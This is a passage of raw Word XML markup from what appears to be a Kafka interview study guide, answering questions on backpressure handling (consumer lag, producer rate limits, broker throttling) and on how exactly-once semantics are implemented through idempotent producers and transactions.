          <w:szCs w:val="22"/>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xml:space="preserve">: If consumers cannot keep up with the rate at which messages are being produced, they can be throttled either through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5775C050"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allows you to throttle the rate at which messages are consumed or produced using various configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5FB4B9"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e of Kafka’s Internal Metrics and Monitoring Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F956D1"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exposes a wide range of metrics through </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JMX</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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70638DC5"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architecture is built to handle backpressure in a distributed environment through mechanisms like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642B089"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ide buffering, retries, and async operations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B35E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side disk management, replication, and log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF0F3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side management of offsets, lag monitoring, and consumer group balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E86C0CF"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ing mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for producers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129FC8A0"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etrics and monitoring tools</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for detecting and managing backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E06CAE"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416" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4FF14C" w14:textId="2D6FDEC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4" w:name="_Toc197868068"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss how Kafka handles backpressure and the role of consumer lag and producer rate limits in managing this</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="854"/>
    </w:p>
    <w:p w14:paraId="2F9EBC9A" w14:textId="7BD102C8" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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handles backpressure through several mechanisms, focusing primarily on how producers send data to brokers, how brokers handle incoming data, and how consumers consume data from Kafka topics. Key concepts such a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producer rate limits</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and other internal controls play an essential role in managing backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B62A59"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 Rate Limiting and Buffering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22838056"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Producers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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If the Kafka broker cannot accept messages fast enough (due to disk I/O, network congestion, or broker overload), producers will experience backpressure. Kafka producers can be configured to either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C0CC8"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 until the buffer has space</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (acks and linger.ms settings control this behavior).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D33970"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 after a configurable delay (retries, retry.backoff.ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F3CEE"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e</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by reducing the rate at which messages are produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E135A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 for Flow Control</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED319AF"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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Consumer Lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A593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and Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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nitoring Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka exposes metrics for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rough JMX (Java Management Extensions) and other monitoring tools like </w:t>
      </w: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Monitoring lag helps identify when consumers are struggling to consume data at the rate it is being produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223838EE"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f Consumer Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ECCDD6"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consumer lag grows too large, consumers may miss important events or overwhelm system resources, leading to delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1809A"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real-time processing applications, high lag can indicate that the system is under heavy load or not scaling properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CF896F"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andling Consumer Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED839F7"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onsumers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka supports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asing Polling Rate</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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roker-side Controls and Replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B957858"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Brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers can also experience backpressure, especially when disk I/O is slow or when the broker is under heavy load. The broker has mechanisms to handle this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7036AA46"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 and Disk Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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can compact logs to keep only the latest value for a key in the log. This reduces the size of logs and helps avoid disk overflow, indirectly managing backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF76380"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1CB10C27"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for throttling to manage backpressure both on the producer and consumer side:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C0829"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Kafka's Consumer Group Model and Backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F60A1D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 xml:space="preserve"> is an essential tool for managing backpressure in a distributed manner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692CED8C"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Consumers per Group</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple consumers in the same group can share the load of reading from different partitions. This scaling allows the system to handle higher message volumes without a single consumer falling behind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA2023A"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Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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535FAB75"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several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18418FA8"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2630E5F1"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manage backpressure by buffering messages, applying retries, and adjusting batch sizes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF21416"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be rate-limited to avoid overwhelming brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9590C"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51D9FF05"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 (the difference between the consumer's offset and the latest available offset) is a key indicator of backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33193E9B"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age offsets manually and scale horizontally using consumer groups to handle increased load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A83875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ide</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EBF5F0"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prevent overload by controlling disk usage and managing replication effectively. Throttling and log compaction help prevent backpressure from escalating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4146D02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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC4B72"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consumer group model enables load balancing and helps reduce lag by distributing partitions across multiple consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D7481A"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a combination of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scal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broker-side optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle backpressure efficiently, ensuring system stability and performance even under heavy load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E89F2E" w14:textId="1E68907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417" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F6A23" w14:textId="4C43265D"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5" w:name="_Toc197868069"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka’s exactly-once semantics. How is it implemented, and why is it important</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="855"/>
    </w:p>
    <w:p w14:paraId="30776498" w14:textId="70328EE3" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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F5AEADD"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ensures that a message is neither lost nor processed more than once, providing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producer and consumer pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF123B6"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is Exactly-Once Semantics (EOS) Implemented?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013FE110"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These mechanisms work together to ensure that messages are reliably produced, delivered, and consumed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9D2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004ACC4"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means that producing a message multiple times will not result in multiple entries in the Kafka log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E649FBA"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be </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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feature ensures that if a message is sent multiple times (due to retries or network failures), it will be written to the topic only once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35506D76"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xml:space="preserve"> uses a </w:t>
      </w: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xml:space="preserve"> for each message it sends. If a message is retried, the broker checks the sequence number and skips writing the message if it’s already been written before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6984239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0D55CB32"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Uniquely identifies the producer instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60FC41"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A number for each message sent by the producer to maintain order and ensure that duplicate messages are not written to the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA2135"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e idempotent producer is enabled by setting acks=all and enable.idempotence=true in the producer configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D98AE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Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05729E3C"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allows for transactions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enables producers to send multiple messages to one or more partitions atomically, i.e., either all the messages are committed or none are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D26C9"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Kafka transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that either all records within a transaction are successfully written to Kafka or none of them are, thus eliminating partial updates and preserving data consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7435AF5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4A942034"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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A producer that starts a transaction, sends multiple messages, and then either commits or aborts the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA439F1"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ordinator</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A special role in Kafka brokers that handles the transaction lifecycle, ensuring atomicity and consistency of message writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4F9E3A"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mmit and Abort</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29488E0E"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al.id: Enables the producer to identify itself as part of a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7E833B"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ks=all: Ensures that the producer waits for the message to be acknowledged by all replicas before committing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D479A"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4830984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need to be able to read messages in an idempotent way while processing them to ensure that each message is processed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4E40D3"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sumer Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>isolation.level</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting is used to control how consumers read messages during transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8E786"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committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4366EBA7"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uncommitted</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows consumers to read both committed and uncommitted messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B35C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ortant Considerations for Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA80B6"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can be configured to </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read only committed messages</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a transactional setting (isolation.level=read_committed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12289E29"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n error occurs, consumers can roll back the offset to avoid processing the same message multiple times, ensuring the exact-once processing guarantee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B484EC8"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hy Exactly-Once Semantics is Important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600317D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plicate Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a message is processed more than once, it could lead to duplicated entries, double-spending, or other inconsistencies in downstream systems (e.g., financial transactions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE647DD"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oss</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a message is lost due to a producer failure, important events might not be captured, leading to incomplete processing or missing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265FB125"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al Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Without EOS, if part of a transaction is committed and part fails, the system could end up with inconsistent states, leading to application errors or broken processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B9356"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Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Without EOS, consumers might process the same message multiple times, causing issues like incorrect state transitions or duplicate transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF01B3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implementing EOS, Kafka ensures that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2251DA90"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 are reliably delivered and consumed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A9344"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write messages atomically in batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17306016"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read messages without missing or duplicating them, even in the face of failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E2F14D"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Exactly-Once Semantics in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4FF17C"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How Exactly-Once Semantics Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE417C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07232AD6"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uses </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent write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xml:space="preserve"> to ensure messages are sent exactly once, even if there are network issues or retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F16CD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088AA61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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>committed messages</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and commit offsets only after processing to ensure no duplicates or missed messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A139940"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w:t>
      </w:r>
    </w:p>
